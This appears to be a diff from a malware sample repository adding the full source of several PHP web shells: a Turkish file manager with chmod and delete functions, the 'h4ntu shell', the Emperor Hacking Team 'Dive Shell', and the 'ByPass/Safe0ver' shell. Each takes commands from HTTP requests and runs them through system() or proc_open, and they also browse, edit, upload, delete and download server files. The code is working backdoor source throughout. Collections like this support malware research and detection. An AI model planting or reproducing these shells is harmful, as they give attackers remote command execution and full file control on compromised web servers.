echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 ÝSÝMLÝ DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEÝÞTÝRÝLEMEDÝ!!</font>";
echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEÝÞTÝRÝLDÝ</font>";
}
if($op=='efp'){
$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
echo "<form method=post action=./$this_file?op=efp2>
<div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
<input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
<input name='dir' type='hidden' value='$yol'>
<input type='submit' value='TAMAM' class='input'></div><br>
</form>";
}
$path=$dir;
if(isset($dir)){
if ($dir = @opendir("$dir")) {
while (($file = readdir($dir)) !== false) {
if($file!="." && $file!=".."){
if(is_file("$path/$file")){
$disk_space=filesize("$path/$file");
$kb=$disk_space/1024;
$total_kb = number_format($kb, 2, '.', '');
$total_kb2="Kb";
echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
echo "<br></div>\n";
}else{
echo "<div align=left><a href='./$this_file?dir=$path/$file'>GÝT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
echo "<font color='#FFFF00'>$dirperm</font>";
echo " <br></div>\n";
}
}
}
closedir($dir);
}
}
echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
if(file_exists("B:\\")){
echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
} else {}
if(file_exists("C:\\")){
echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
} else {}
if (file_exists("D:\\")){
echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
} else {}
if (file_exists("E:\\")){
echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
} else {}
if (file_exists("F:\\")){
echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
} else {}
if (file_exists("G:\\")){
echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
} else {}
if (file_exists("H:\\")){
echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
} else {}
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<center><font size='+1' color='#FF0000'><b>SERVER BÝLGÝLERÝ</b></font><br></center>";
echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
echo "<br>";
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<center><font size='+1' color='#FF0000'><b>ÝÞLEMLER</b></font><br></center>";
echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Oluþtur</a></font></center>";
echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Oluþtur</a></font></center>";
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<center>Tüm haklarý sahibi C-W-M'ye aittir</center><br>";
?>

78
PHP/Backdoor.PHP.Agent.x Normal file
View File

@ -0,0 +1,78 @@
<title>h4ntu shell [powered by tsoi]</title>
<?php
echo "<p><font size=2 face=Verdana><b>This Is The Server Information</b></font></p>";
?>
<?php
closelog( );
$user = get_current_user( );
$login = posix_getuid( );
$euid = posix_geteuid( );
$ver = phpversion( );
$gid = posix_getgid( );
if ($chdir == "") $chdir = getcwd( );
if(!$whoami)$whoami=exec("whoami");
?>
<meta name="generator" content="Namo WebEditor v5.0">
<br>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = posix_uname( );
while (list($info, $value) = each ($uname)) {
?>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?= $value ?></DIV></TD>
</TR>
<?php
}
?>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Current Path:</b> <?= $chdir ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Adress:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Script Current User:</b> <?= $user ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>PHP Version:</b> <?= $ver ?></DIV></TD>
</TR>
</TABLE>
<BR>
<font face="courier new" size="2" color="777777"><b>#</b>php injection: <br>
</font><FORM name=injection METHOD=POST ACTION="<?php echo $_SERVER["REQUEST_URI"];?>">
<font face="courier new" size="2" color="777777">cmd :
<INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($_POST['cmd'])); ?>" size="161">
<br>
<INPUT TYPE="submit">
</font></FORM>
<hr color=777777 width=100% height=115px>
<pre>
<?
$cmd = $_POST['cmd'];
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
exit;
?>
</pre>

187
PHP/Backdoor.PHP.Agent.y Normal file
View File

@ -0,0 +1,187 @@
<?php
/*Emperor Hacking TEAM */
session_start();
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
$_SESSION['cwd'] = getcwd();
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
if (!empty($_REQUEST['command'])) {
if (get_magic_quotes_gpc()) {
$_REQUEST['command'] = stripslashes($_REQUEST['command']);
}
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
unset($_SESSION['history'][$i]);
array_unshift($_SESSION['history'], $_REQUEST['command']);
$_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
$_SESSION['cwd'] = dirname(__FILE__);
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
if ($regs[1][0] == '/') {
$new_dir = $regs[1];
} else {
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}
} else {
chdir($_SESSION['cwd']);
$length = strcspn($_REQUEST['command'], " \t");
$token = substr($_REQUEST['command'], 0, $length);
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
$p = proc_open($_REQUEST['command'],
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
ENT_COMPAT, 'UTF-8');
}
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
}
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
}
header('Content-Type: text/html; charset=UTF-8');
echo '<?xml version="Dive.0.1" encoding="UTF-8"?>' . "\n";
?>
<head>
<title>Dive Shell - Emperor Hacking Team</title>
<link rel="stylesheet" href="Simshell.css" type="text/css" />
<script type="text/javascript" language="JavaScript">
var current_line = 0;
var command_hist = new Array(<?php echo $js_command_hist ?>);
var last = 0;
function key(e) {
if (!e) var e = window.event;
if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
current_line++;
document.shell.command.value = command_hist[current_line];
}
if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
current_line--;
document.shell.command.value = command_hist[current_line];
}
}
function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}
</script>
</head>
<body onload="init()" style="color: #00FF00; background-color: #000000">
<span style="background-color: #FFFFFF">
</body>
</body>
</html>
</span>
<p><font color="#FF0000"><span style="background-color: #000000">&nbsp;Directory: </span> <code>
<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code>
</font></p>
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" style="border: 1px solid #808080">
<div style="width: 989; height: 456">
<p align="center"><b>
<font color="#C0C0C0" face="Tahoma">Command:</font></b><input class="prompt" name="command" type="text"
onkeyup="key(event)" size="88" tabindex="1" style="border: 4px double #C0C0C0; ">
<input type="submit" value="Submit" /> &nbsp;<font color="#0000FF">
</font>
&nbsp;<textarea name="output" readonly="readonly" cols="107" rows="22" style="color: #FFFFFF; background-color: #000000">
<?php
$lines = substr_count($_SESSION['output'], "\n");
$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
?>
</textarea> </p>
<p class="prompt" align="center">
<b><font face="Tahoma" color="#C0C0C0">Rows:</font><font face="Tahoma" color="#0000FF" size="2"> </font></b>
<input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" /></p>
<p class="prompt" align="center">
<b><font color="#C0C0C0" face="SimSun">Edited By Emperor Hacking Team</font></b></p>
<p class="prompt" align="center">
<font face="Tahoma" size="2" color="#808080">iM4n - FarHad - imm02tal - R$P</font><font color="#808080"><br>
&nbsp;</font></p>
</div>
</form>
<p class="prompt" align="center">
<b><font color="#000000">&nbsp;</font><font color="#000000" size="2"> </font>
</b></p>
</html>

2062
PHP/Backdoor.PHP.Agent.z Normal file
View File

File diff suppressed because it is too large Load Diff

922
PHP/Backdoor.PHP.ByPass.a Normal file
View File

@ -0,0 +1,922 @@
<?php
/*
*****************************************************************************************
* ByPass PHP SHELL *
* WWW.php-shell.org *
*****************************************************************************************
*/
$SFileName=$PHP_SELF;
error_reporting(0);
$PHPVer=phpversion();
$isGoodver=(intval($PHPVer[0])>=4);
$scriptTitle = "Safe0ver";
$scriptident = "<a href =http://www.WWW.php-shell.org>"."$scriptTitle By TDT - www.WWW.php-shell.org</a>";
$urlAdd = "";
$formAdd = "";
function walkArray($array){
while (list($key, $data) = each($array))
if (is_array($data)) { walkArray($data); }
else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
}
if (isset($_PUT)) walkArray($_PUT);
if (isset($_GET)) walkArray($_GET);
if (isset($_POST)) walkArray($_POST);
$pos = strpos($urlAdd, "s=r");
if (strval($pos) != "") {
$urlAdd= substr($urlAdd, 0, $pos);
}
$urlAdd .= "&s=r&";
if (empty($Pmax))
$Pmax = 125;
if (empty($Pidx))
$Pidx = 0;
$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
$scriptdate = "7 Subat 2007";
$scriptver = "TDT Version";
$LOCAL_IMAGE_DIR = "img";
$REMOTE_IMAGE_URL = "img";
$img = array(
"Edit" => "edit.gif",
"Download" => "download.gif",
"Upload" => "upload.gif",
"Delete" => "delete.gif",
"View" => "view.gif",
"Rename" => "rename.gif",
"Move" => "move.gif",
"Copy" => "copy.gif",
"Execute" => "exec.gif"
);
while (list($id, $im)=each($img))
if (file_exists("$LOCAL_IMAGE_DIR/$im"))
$img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
else
$img[$id] = "[$id]";
if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) {
setcookie("noauth","");
Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\"");
Header( "HTTP/1.0 401 Unauthorized");
echo "Your username or password is incorrect";
exit ;
}
function buildUrl($display, $url) {
global $urlAdd;
$url = $SFileName . "?$urlAdd$url";
return "<a href=\"$url\">$display</a>";
}
function sp($mp) {
for ( $i = 0; $i < $mp; $i++ )
$ret .= "&nbsp;";
return $ret;
}
function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr); }
function Mydeldir($Fdir) {
if (is_dir($Fdir)) {
$Fh=@opendir($Fdir);
while ($Fbuf = readdir($Fh))
if (($Fbuf != ".") && ($Fbuf != ".."))
Mydeldir("$Fdir/$Fbuf");
@closedir($Fh);
return rmdir($Fdir);
} else {
return unlink($Fdir);
}
}
function arrval ($array) {
list($key, $data) = $array;
return $data;
}
function formatsize($insize) {
$size = $insize;
$add = "B";
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "KB";
}
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "MB";
}
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "GB";
}
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "TB";
}
return "$size $add";
}
if ($cmd != "downl") {
?>
<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?> -->
<HTML>
<HEAD>
<STYLE>
<!--
A{ text-decoration:none; color:navy; font-size: 12px }
body {
font-size: 12px;
font-family: arial, helvetica;
scrollbar-width: 5;
scrollbar-height: 5;
scrollbar-face-color: white;
scrollbar-shadow-color: silver;
scrollbar-highlight-color: white;
scrollbar-3dlight-color:silver;
scrollbar-darkshadow-color: silver;
scrollbar-track-color: white;
scrollbar-arrow-color: black;
background-color: #CCCCCC;
}
Table { font-size: 12px; }
TR{ font-size: 12px; }
TD{
font-size: 12px;
font-family: arial, helvetical;
BORDER-LEFT: black 0px solid;
BORDER-RIGHT: black 0px solid;
BORDER-TOP: black 0px solid;
BORDER-BOTTOM: black 0px solid;
COLOR: black;
background: #CCCCCC;
}
.border{ BORDER-LEFT: black 1px solid;
BORDER-RIGHT: black 1px solid;
BORDER-TOP: black 1px solid;
BORDER-BOTTOM: black 1px solid;
}
.none { BORDER-LEFT: black 0px solid;
BORDER-RIGHT: black 0px solid;
BORDER-TOP: black 0px solid;
BORDER-BOTTOM: black 0px solid;
}
.inputtext {
background-color: #EFEFEF;
font-family: arial, helvetica;
border: 1px solid #000000;
height: 20;
}
.lighttd { background: #F8F8F8;
}
.darktd { background: #CCCCCC;
}
input { font-family: arial, helvetica;
}
.inputbutton {
background-color: #CCCCCC;
border: 1px solid #000000;
border-width: 1px;
height: 20;
}
.inputtextarea {
background-color: #CCCCCC;
border: 1px solid #000000;
scrollbar-width: 5;
scrollbar-height: 5;
scrollbar-face-color: #EFEFEF;
scrollbar-shadow-color: silver;
scrollbar-highlight-color: #EFEFEF;
scrollbar-3dlight-color:silver;
scrollbar-darkshadow-color: silver;
scrollbar-track-color: #EFEFEF;
scrollbar-arrow-color: black;
}
.top { BORDER-TOP: black 1px solid; }
.textin { BORDER-LEFT: silver 1px solid;
BORDER-RIGHT: silver 1px solid;
BORDER-TOP: silver 1px solid;
BORDER-BOTTOM: silver 1px solid;
width: 99%; font-size: 12px; font-weight: bold; color: Black;
}
.notop { BORDER-TOP: black 0px solid; }
.bottom { BORDER-BOTTOM: black 1px solid; }
.nobottom { BORDER-BOTTOM: black 0px solid; }
.left { BORDER-LEFT: black 1px solid; }
.noleft { BORDER-LEFT: black 0px solid; }
.right { BORDER-RIGHT: black 1px solid; }
.noright { BORDER-RIGHT: black 0px solid; }
.silver{ BACKGROUND: #CCCCCC; }
body,td,th {
color: #660000;
}
a:link {
color: #000000;
text-decoration: none;
}
a:hover {
color: #00FF00;
text-decoration: none;
}
a:active {
color: #666666;
text-decoration: none;
}
a:visited {
text-decoration: none;
}
.style5 {
color: #660000;
font-weight: bold;
}
-->
</STYLE>
<TITLE><?php echo $SFileName ?></TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
<body topmargin="0" leftmargin="0">
<div style="position: absolute; background: #CCCCCC; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
<table nowrap width=100% border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="silver border"><center>
<strong> <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> </strong>
</center></td>
</tr>
</table>
<table width=100% height="100%" NOWRAP border="0">
<tr NOWRAP>
<td width="100%" NOWRAP><br>
<?php
}
if ( $cmd=="dir" ) {
$h=@opendir($dir);
if ($h == false) {
echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
Klas?r Listelenemiyor!L?tfen Bypass B?l?m?n? Deneyin.<br>".sp(3)."\n
Script Gecisi Tamamlayamadi!
<br><br>".sp(3)."\n
Klas?re Girmek Icin yetkiniz Olduguna emin Olunuz...
<br><br></font>\n\n\n\n";
}
if (function_exists('realpath')) {
$partdir = realpath($dir);
}
else {
$partdir = $dir;
}
if (strlen($partdir) >= 100) {
$partdir = substr($partdir, -100);
$pos = strpos($partdir, "/");
if (strval($pos) != "") {
$partdir = "<-- ...".substr($partdir, $pos);
}
$partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
}
?>
<form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
<table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="silver border">
<center>&nbsp;Safe0ver-Server File Browser...&nbsp;</center>
</td>
</tr>
</table>
<br>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td class="border nobottom noright">
&nbsp;Listeliyor:&nbsp;
</td>
<td width="100%" class="border nobottom noleft">
<table width="100%" border="0" cellpadding="1" cellspacing="0">
<tr>
<td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
<td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GiT<b></a>&nbsp;<center></td>
</tr>
</table>
</td>
</tr>
</table>
<!-- </form> -->
<table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
<tr>
<td width="100%" NOWRAP class="silver border">
&nbsp;Dosya Adi&nbsp;
</td>
<td NOWRAP class="silver border noleft">
&nbsp;Yapilabilecekler&nbsp;&nbsp;
</td>
<td NOWRAP class="silver border noleft">
&nbsp;Boyut&nbsp;
</td>
<td width=1 NOWRAP class="silver border noleft">
&nbsp;Yetkiler&nbsp;
</td>
<td NOWRAP class="silver border noleft">
&nbsp;Son D?zenleme&nbsp;
</td>
<tr>
<?php
$dirn = array();
$filen = array();
$filesizes = 0;
while ($buf = readdir($h)) {
if (is_dir("$dir/$buf"))
$dirn[] = $buf;
else
$filen[] = $buf;
}
$dirno = count($dirn) + 1;
$fileno = count($filen) + 1;
function mycmp($a, $b){
if ($a == $b) return 0;
return (strtolower($a) < strtolower($b)) ? -1 : 1;
}
if (function_exists("usort")) {
usort($dirn, "mycmp");
usort($filen, "mycmp");
}
else {
sort ($dirn);
sort ($filen);
}
reset ($dirn);
reset ($filen);
if (function_exists('array_merge')) {
$filelist = array_merge ($dirn, $filen);
}
else {
$filelist = $dirn + $filen;
}
if ( count($filelist)-1 > $Pmax ) {
$from = $Pidx * $Pmax;
$to = ($Pidx + 1) * $Pmax-1;
if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
$to = count($filelist) - 1;
if ($to > count($filelist)-1)
$to = count($filelist)-1;
$Dcontents = array();
For ($Fi = $from; $Fi <= $to; $Fi++) {
$Dcontents[] = $filelist[$Fi];
}
}
else {
$Dcontents = $filelist;
}
$tdcolors = array("lighttd", "darktd");
while (list ($key, $file) = each ($Dcontents)) {
if (!$tdcolor=arrval(each($tdcolors))) {
reset($tdcolors);
$tdcolor = arrval(each($tdcolors)); }
if (is_dir("$dir/$file")) {
echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
if ( ($file != ".") && ($file != "..") )
echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
if ( ($file != ".") && ($file != "..") )
echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
echo "&nbsp;&nbsp;</center></td>\n";
echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
echo "<strong>D</strong>";
if ( @is_readable("$dir/$file") ) {
echo "<strong>R</strong>";
}
if (function_exists('is_writeable')) {
if ( @is_writeable("$dir/$file") ) {
echo "<strong>W</stong>";
}
}
else {
echo "<strong>(W)</stong>";
}
if ( @is_executable("$dir/$file") ) {
echo "<Strong>X<strong>";
}
echo "&nbsp;&nbsp;</td>\n";
echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
echo "</td>";
echo "</tr>\n";
}
else {
if ( @is_readable("$dir/$file") )
echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
else
echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
if ( @is_executable("$dir/$file") )
echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
echo sp(2)."</center></td>\n";
echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
$size = @filesize("$dir/$file");
If ($size != false) {
$filesizes += $size;
echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
}
else
echo "&nbsp;&nbsp;<strong>0 B<strong>";
echo "&nbsp;&nbsp;</td>\n";
echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
if ( @is_readable("$dir/$file") )
echo "<strong>R</strong>";
if ( @is_writeable("$dir/$file") )
echo "<strong>W</stong>";
if ( @is_executable("$dir/$file") )
echo "<Strong>X<strong>";
if (function_exists('is_uploaded_file')){
if ( @is_uploaded_file("$dir/$file") )
echo "<Strong>U<strong>";
}
else {
echo "<Strong>(U)<strong>";
}
echo "&nbsp;&nbsp;</td>\n";
echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
echo "</td>";
echo "</tr>\n";
}
}
echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Klas?r,&nbsp;".@count ($filen)."&nbsp;Dosya&nbsp;&nbsp;\n";
echo "</td><td NOWRAP class=\"silver border noleft\">\n";
echo "&nbsp;&nbsp;Toplam Dosya Boyutu:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
function printpagelink($a, $b, $link = ""){
if ($link != "")
echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
else
echo "<b>| $a - $b |</b>";
}
if ( count($filelist)-1 > $Pmax ) {
echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
$Fi = 0;
while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
$from = $Fi*$Pmax;
while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
$to = ($Fi + 1) * $Pmax - 1;
if ($Fi == $Pidx)
$link="";
else
$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
echo "&nbsp;&nbsp;&nbsp;";
$Fi++;
}
$from = $Fi*$Pmax;
while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
$to = count($filelist)-1;
if ($Fi == $Pidx)
$link="";
else
$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
echo "</center></td></tr></table></td></tr>";
}
echo "</table>\n<br><table NOWRAP>";
if ($isGoodver) {
echo "<tr><td class=\"silver border\">&nbsp;<strong>PHP Versiyonu:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
}
else {
echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
}
echo "<tr><td class=\"silver border\">&nbsp;<strong>Diger Islemler:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
echo "<td>&nbsp;<b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
buildUrl( "| Yeni Klas?r |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
buildUrl( "| Dosya Y?kle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
echo "<tr><td class=\"silver border\">&nbsp;<strong>IP Adresin:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
echo "<tr><td class=\"silver border\">&nbsp;<strong>Bulundugun Klas?r:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Semboller:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
echo "<table NOWRAP>";
echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Klas?r.</td></tr>\n";
echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Okunabilir.</td></tr>\n";
echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Yazilabilir.</td></tr>\n";
echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Komut Calistirilabilir.</td></tr>\n";
echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
echo "</table></td>";
echo "</table>";
echo "<br>";
@closedir($h);
}
elseif ( $cmd=="execute" ) {
echo system("$file");
}
